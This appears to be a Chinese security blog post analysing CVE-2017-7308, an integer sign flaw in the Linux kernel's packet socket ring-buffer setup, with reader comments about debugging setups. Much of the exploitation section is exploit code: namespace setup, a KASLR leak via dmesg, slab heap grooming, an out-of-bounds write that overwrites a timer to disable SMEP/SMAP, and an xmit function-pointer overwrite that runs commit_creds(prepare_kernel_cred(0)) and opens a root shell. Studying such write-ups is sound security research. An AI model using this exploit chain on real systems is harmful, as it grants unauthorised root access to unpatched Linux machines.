CVE-2017-7308 Linux Kernel packet_set_ring 整数符号错误漏洞分析及利用(本地提权)

# 1. 前言

此漏洞存在于`Linux Kernel 4.10.6`以下的版本中，本文的测试环境为`Ubuntu 14.04 LTS`

```
$ git clone git://kernel.ubuntu.com/ubuntu/ubuntu-trusty.git
$ git checkout Ubuntu-lts-4.4.0-31.50_14.04.1
```

# 2. 漏洞分析

漏洞发生在`net/packet/af_packet.c`的`packet_set_ring`函数中，此函数会在设置`ring buffer`时被调用，`ring buffer`是用于数据包处理的缓冲区，`rx_ring`是接收数据的缓冲区，`tx_ring`是传输数据的缓冲区，本文用到`rx_ring`，分别可以通过`setsockopt`的`PACKET_RX_RING`和`PACKET_TX_RING`参数进行设置，` packet_ring_buffer`定义如下：

```
struct packet_ring_buffer {
    struct pgv *pg_vec;
    struct tpacket_kbdq_core prb_bdqc;
}

struct pgv {
    char *buffer;
}
```

![1.png-17kB][1]

[1]: http://static.zybuluo.com/birdg0/n7sm7n9ojt71a3cavynwl3pz/1.png
  [2]: https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
  [3]: http://static.zybuluo.com/birdg0/2dvlfht4ygieooilcpuc2ozc/2.png
  [4]: http://static.zybuluo.com/birdg0/80200nifrv8olnr7t5w6mbti/3.png
  [5]: http://static.zybuluo.com/birdg0/9situ0n6a2pe53deq7bn4gng/image.png
  [6]: http://static.zybuluo.com/birdg0/6oko6ojl6rg5cys3k56tivde/image.png
  [7]: http://static.zybuluo.com/birdg0/6gucggdubx5k514fjis97qad/image.png
  [8]: http://static.zybuluo.com/birdg0/ardc2spk4gsofl59bi39rriy/image.png
  [9]: http://static.zybuluo.com/birdg0/1hib76a9ly0mzbwktyobae74/image.png
  [10]: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
  [11]: https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
  [12]: https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308
  [13]: http://blog.nsfocus.net/gdb-kgdb-debug-application/
  [14]: http://blackbunny.io/linux-kernel-x86-64-bypass-smep-kaslr-kptr_restric/

接下来看导致漏洞的代码

```c
if (po->tp_version >= TPACKET_V3 &&
	(int)(req->tp_block_size -
	  BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
	goto out;
```

当`PACKET_VERSION`为`TPACKET_V3`时，`(int)(req->tp_block_size - BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)`会由于符号问题能够绕过这个检测，例如：

```
A = req->tp_block_size = 4096 = 0x1000
B = req_u->req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000
BLK_PLUS_PRIV(B) = (1 << 31) + 4096 + 48 = 0x80001030
A - BLK_PLUS_PRIV(B) = 0x1000 - 0x80001030 = 0x7fffffd0
(int)0x7fffffd0 = 0x7fffffd0 > 0
```

这样就会在之后导致一系列问题，在`init_prb_bdqc`函数中

```c
static void init_prb_bdqc(struct packet_sock *po,
			struct packet_ring_bufferpacket_lookup_frame_in_block *rb,
			struct pgv *pg_vec,
			union tpacket_req_u *req_u)
{
	struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
	struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
	p1->pkbdq = pg_vec;
	pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
	p1->pkblk_start	= pg_vec[0].buffer;
	p1->kblk_size = req_u->req3.tp_block_size;
	p1->knum_blocks	= req_u->req3.tp_block_nr;
	...
	p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;

p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);
	prb_init_ft_ops(p1, req_u);
	prb_setup_retire_blk_timer(po);
	prb_open_block(p1, pbd);
}
```

`p1->blk_sizeof_priv`的类型为`unsigned short`，而`req_u->req3.tp_sizeof_priv`的类型为`unsigned int`，在转换后只会取低两个字节的值，由于之前的检测绕过问题这里可以给`p1->blk_sizeof_priv`赋任意值，这样如果`BLK_PLUS_PRIV(p1->blk_sizeof_priv) > p1->kblk_size`就可以把`p1->max_frame_len`赋值为一个很大的值来绕过很多检测，在之后的`prb_open_block`函数中

```c
static void prb_open_block(struct tpacket_kbdq_core *pkc1,
	struct tpacket_block_desc *pbd1)
{
    ...
	pkc1->pkblk_start = (char *)pbd1;
	pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);
    ...
}
```

`pkc1->nxt_offset`指向缓冲区`ring_buffer`中`block`当前可接收数据的起始地址，由于`pkc1->blk_sizeof_priv`可控，因此可以控制`pkc1->nxt_offset`在接收数据包时造成堆越界。

# 3. 漏洞利用

EXP参考[https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c][2]，由于测试环境的内核版本是`4.4`，因此需要修改几处偏移。主要思路是通过堆越界覆盖`packet_sock`结构体中的成员`packet_sock->xmit`和`packet_sock->rx_ring->prb_bdqc->retire_blk_timer`，因此进行堆布局构造连续的多个`packet_sock`结构体使前一个`packet_sock->rx_ring->prb_bdqc->nxt_offset`指向后面的`packet_sock`结构体的上面两个成员。

## 3.1 安装沙盒

要对更底层的网络进行操作，需要有`CAP_NET_RAW`权限，可以通过网络命名空间来实现，编译内核时需要开启`CONFIG_USER_NS=y`

```
void setup_sandbox() {
    int real_uid = getuid();
    int real_gid = getgid();

if (unshare(CLONE_NEWUSER) != 0) {
        perror("[-] unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

if (unshare(CLONE_NEWNET) != 0) {
        perror("[-] unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

if (!write_file("/proc/self/setgroups", "deny")) {
        perror("[-] write_file(/proc/self/set_groups)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
        perror("[-] write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }
    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
        perror("[-] write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }

cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(0, &my_set);
    if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
        perror("[-] sched_setaffinity()");
        exit(EXIT_FAILURE);
    }

if (system("/sbin/ifconfig lo up") != 0) {
        perror("[-] system(/sbin/ifconfig lo up)");
        exit(EXIT_FAILURE);
    }
}
```

## 3.2 绕过KASLR

由于没有对`dmesg`做限制，因此会有残留的`syslog`能够泄漏出内核地址

```
$ dmesg | grep 'Freeing SMP'
[    0.022785] Freeing SMP alternatives memory: 28K (ffffffff81e83000 - ffffffff81e8a000)
```

## 3.3 堆布局

`packet_sock`结构体会在用户层创建`socket`时在内核创建，它通过`kmalloc`分配空间，`kmalloc`底层通过`slab allocator`进行分配，而为了提升性能减少重复的申请和释放，会用多个`slab`组成一个对应特定大小的缓存，在释放操作时并不会真正的释放，而是放入缓存修改成未使用状态，等下一次有相同大小的内存申请时直接从缓存返回，而不需要再次真正的申请物理内存，大小为`2^n`，`4.4`版本内核的`packet_sock`大小为`1408`

```c
$ pahole -C packet_sock src/ubuntu-trusty/vmlinux
struct packet_sock {
	struct sock                sk;                   /*     0   704 */
	/* --- cacheline 11 boundary (704 bytes) --- */
	struct packet_fanout *     fanout;               /*   704     8 */
	union tpacket_stats_u      stats;                /*   712    12 */

/* XXX 4 bytes hole, try to pack */

struct packet_ring_buffer  rx_ring;              /*   728   232 */
	/* --- cacheline 15 boundary (960 bytes) --- */
	struct packet_ring_buffer  tx_ring;              /*   960   232 */
	/* --- cacheline 18 boundary (1152 bytes) was 40 bytes ago --- */
	int                        copy_thresh;          /*  1192     4 */
	spinlock_t                 bind_lock;            /*  1196     4 */
	struct mutex               pg_vec_lock;          /*  1200    40 */
	/* --- cacheline 19 boundary (1216 bytes) was 24 bytes ago --- */
	unsigned int               running:1;            /*  1240:31  4 */
	unsigned int               auxdata:1;            /*  1240:30  4 */
	unsigned int               origdev:1;            /*  1240:29  4 */
	unsigned int               has_vnet_hdr:1;       /*  1240:28  4 */

/* XXX 28 bits hole, try to pack */

int                        pressure;             /*  1244     4 */
	int                        ifindex;              /*  1248     4 */
	__be16                     num;                  /*  1252     2 */

/* XXX 2 bytes hole, try to pack */

struct packet_rollover *   rollover;             /*  1256     8 */
	struct packet_mclist *     mclist;               /*  1264     8 */
	atomic_t                   mapped;               /*  1272     4 */
	enum tpacket_versions      tp_version;           /*  1276     4 */
	/* --- cacheline 20 boundary (1280 bytes) --- */
	unsigned int               tp_hdrlen;            /*  1280     4 */
	unsigned int               tp_reserve;           /*  1284     4 */
	unsigned int               tp_loss:1;            /*  1288:31  4 */
	unsigned int               tp_tx_has_off:1;      /*  1288:30  4 */

/* XXX 30 bits hole, try to pack */

unsigned int               tp_tstamp;            /*  1292     4 */
	struct net_device *        cached_dev;           /*  1296     8 */
	int                        (*xmit)(struct sk_buff *); /*  1304     8 */

/* XXX 32 bytes hole, try to pack */

/* --- cacheline 21 boundary (1344 bytes) --- */
	struct packet_type         prot_hook;            /*  1344    56 */

/* size: 1408, cachelines: 22, members: 27 */
	/* sum members: 1362, holes: 3, sum holes: 38 */
	/* bit holes: 2, sum bit holes: 58 bits */
	/* padding: 8 */
};
```

因此`1024 < 1408 < 2048`，`packet_sock`会使用`kmalloc-2048`缓存，这个缓冲使用`0x8000`大小的`slab`，这样先申请`512`个`socket`使`kmalloc-2048`缓存耗尽，再创建一个有`1024`个块大小为`0x8000`的`ring_buffer`的`packet_sock`，申请`block`会使`page allocator`的`freelist`中的相应大小的页耗尽，因为申请物理页的大小也是按`2^n`计算，这样之后再申请就会从第一个大于`n`的`m`且`freelist`中不为空的`2^m`大小的页中分割内存

```c
#define KMALLOC_PAD 512
#define PAGEALLOC_PAD 1024

kmalloc_pad(KMALLOC_PAD);
pagealloc_pad(PAGEALLOC_PAD);
```

## 3.4 绕过SMEP和SMAP

完成预热后申请一个`packet_sock`并且设置一个有两个块大小为`0x8000`的`ring_buffer`，再申请多个连续的`packet_sock`，由于`kmalloc-2048`缓存和`freelist`中相应大小的页中都已耗尽，这样它们会有很大机会在更大的页上被连续得分配

![2.png-18.7kB][3]

绕过`SMEP`和`SMAP`只需把`CR4`寄存器的第`20`和`21`位赋值为`0`

![3.png-28.4kB][4]

具体代码如下：

```c
#define NATIVE_WRITE_CR4 0x61220ul
#define CR4_DESIRED_VALUE 0x407f0ul
#define TIMER_OFFSET 880

int oob_setup(int offset) {
    unsigned int maclen = ETH_HDR_LEN;
    unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
                (maclen < 16 ? 16 : maclen));
    unsigned int macoff = netoff - maclen;
    unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
        0x8000 - BLK_HDR_LEN - macoff + offset;
    return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
}

void oob_timer_execute(void *func, unsigned long arg) {
    oob_setup(2048 + TIMER_OFFSET - 8);

int i;
    for (i = 0; i < 32; i++) {
        int timer = packet_sock_kmalloc();
        packet_sock_timer_schedule(timer, 1000);
    }

char buffer[2048];
    memset(&buffer[0], 0, sizeof(buffer));

struct timer_list *timer = (struct timer_list *)&buffer[8];
    timer->function = func;
    timer->data = arg;
    timer->flags = 1;

oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);

sleep(1);
}

oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);
```

这里是覆盖`packet_sock->rx_ring->prb_bdqc->retire_blk_timer`，由于会在`retire timer`超时后调用`retire_blk_timer->function(retire_blk_timer->data)`，这样就可以通过`native_write_cr4(X)`来绕过`SMEP`和`SMAP`。另外再说一下`sizeof_priv`的计算，`tpacket`接收数据包时会调用`tpacket_rcv`函数

```c
static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
		       struct packet_type *pt, struct net_device *orig_dev)
{
    ...
    h.raw = packet_current_rx_frame(po, skb, TP_STATUS_KERNEL, (macoff+snaplen));
    ...
    skb_copy_bits(skb, 0, h.raw + macoff, snaplen);
    ...
}

static void *packet_current_rx_frame(struct packet_sock *po,
					    struct sk_buff *skb,
					    int status, unsigned int len)
{
	char *curr = NULL;
	switch (po->tp_version) {
    ...
	case TPACKET_V3:
		return __packet_lookup_frame_in_block(po, skb, status, len);
    ...
	}
}

static void *__packet_lookup_frame_in_block(struct packet_sock *po,
					    struct sk_buff *skb,
						int status,
					    unsigned int len
					    )
{
	struct tpacket_kbdq_core *pkc;
	struct tpacket_block_desc *pbd;
	char *curr, *end;

pkc = GET_PBDQC_FROM_RB(&po->rx_ring);
	pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);

...
	curr = pkc->nxt_offset;
	pkc->skb = skb;
	end = (char *)pbd + pkc->kblk_size;

/* first try the current block */
	if (curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end) {
		prb_fill_curr_block(curr, pkc, pbd, len);
		return (void *)curr;
	}

/* Ok, close the current block */
	prb_retire_current_block(pkc, po, 0);

/* Now, try to dispatch the next block */
	curr = (char *)prb_dispatch_next_block(pkc, po);
	if (curr) {
		pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
		prb_fill_curr_block(curr, pkc, pbd, len);
		return (void *)curr;
	}
    ...
}

static void *prb_dispatch_next_block(struct tpacket_kbdq_core *pkc,
		struct packet_sock *po)
{
    ...
	prb_open_block(pkc, pbd);
	return (void *)pkc->nxt_offset;
}
```

`__packet_lookup_frame_in_block`会返回当前缓冲区中可接收数据的起始地址，由于`curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end`，之后就会从第二个块中找空余的空间（这也是上面创建两个块的原因），`blk_sizeof_priv = 0x8000 - BLK_HDR_LEN - macoff + 2048 + TIMER_OFFSET - 8`会在计算`p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv)`时使`p1->max_frame_len`为一个很大的值以此来绕过后面的一些检测，`h.raw = pg_vec[1].buffer + blk_sizeof_priv + BLK_HDR_LEN = pg_vec[1].buffer - macoff + 2048 + TIMER_OFFSET - 8`，调用`skb_copy_bits(skb, 0, h.raw + macoff, snaplen)`把数据复制到缓存区时的起始地址为`pg_vec[1].buffer + 2048 + TIMER_OFFSET - 8`，跳过后面紧跟的一个`packet_sock`，这样最终的复制起始地址为后面紧跟的第二个`packet_sock + TIMER_OFFSET - 6`（由于对齐导致是`-6`，为了把一些值置为0）

![image.png-106.9kB][5]

`0xffff8800346c0b6a`刚好在前面创建的`32`个`packet_sock`中

![image.png-96kB][6]

`memcpy`后成功覆盖了`retire_blk_timer`

![image.png-41.4kB][7]

## 3.5 提权

跟上一步类似只是这里覆盖`packet_sock`的`xmit`函数指针，它会在发送数据时被调用，在关闭`SMEP`后返回到用户空间执行`commit_creds(prepare_kernel_cred(0))`实现提权

```c
#define XMIT_OFFSET 1304

void oob_id_match_execute(void *func) {
    int s = oob_setup(2048 + XMIT_OFFSET - 64);

int ps[32];

int i;
    for (i = 0; i < 32; i++)
        ps[i] = packet_sock_kmalloc();

char buffer[2048];
    memset(&buffer[0], 0, 2048);

void **xmit = (void **)&buffer[64];
    *xmit = func;

oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);

for (i = 0; i < 32; i++)
        packet_sock_id_match_trigger(ps[i]);
}

oob_id_match_execute((void *)&get_root_payload);
```

## 3.6 恢复网络

由于隔离了网络命名空间，导致只有一个回环接口不能连接网络

![image.png-105.5kB][8]

但是现在是`root`权限，因此可以加入到`init`进程的网络命名空间来恢复网络

```
void exec_shell() {
    char *shell = "/bin/bash";
    char *args[] = {shell, "-i", NULL};
    
    int fd;
    
    fd = open("/proc/1/ns/net", O_RDONLY);
    if (fd == -1)
    {
        perror("error opening /proc/1/ns/net");
        exit(EXIT_FAILURE);
    }
    
    if (setns(fd, CLONE_NEWNET) == -1)
    {
        perror("error calling setns");
        exit(EXIT_FAILURE);
    }
    
    execve(shell, args, NULL);
}
```

![image.png-208kB][9]

# 4. 参考

1. [https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html][10]
2. [https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c][11]
3. [https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308][12]
4. [http://blog.nsfocus.net/gdb-kgdb-debug-application/][13]
5. [http://blackbunny.io/linux-kernel-x86-64-bypass-smep-kaslr-kptr_restric/][14]

a

May 19th, 2020 at 02:33 pm

师傅你好,请问拟采用的是双机调试吗,还是qemu启动的ubuntu镜像?我用的qemu启动的4.8.0-41-generic版本的内核,exp运行不成功,想请教下调试环境的搭建,谢谢了

回复
1. bird
  
  June 4th, 2020 at 10:24 am
  
  我用的双机调试
  
  回复
  1. misM
    
    November 18th, 2021 at 04:32 pm
    
    你好，我环境搭建exp运行不成功，可以请教一下吗？gdb调试中，在分配32个packet_sock对象地址并不连续，这是为什么呢？目前使用4.10.6的内核编译，使用qemu运行，想跟您探讨下，非常感谢~
    
    回复
2. 带头大哥
  
  August 7th, 2020 at 06:50 pm
  
  问题解决了吗,我也遇到同样的问题
  
  回复

取消回复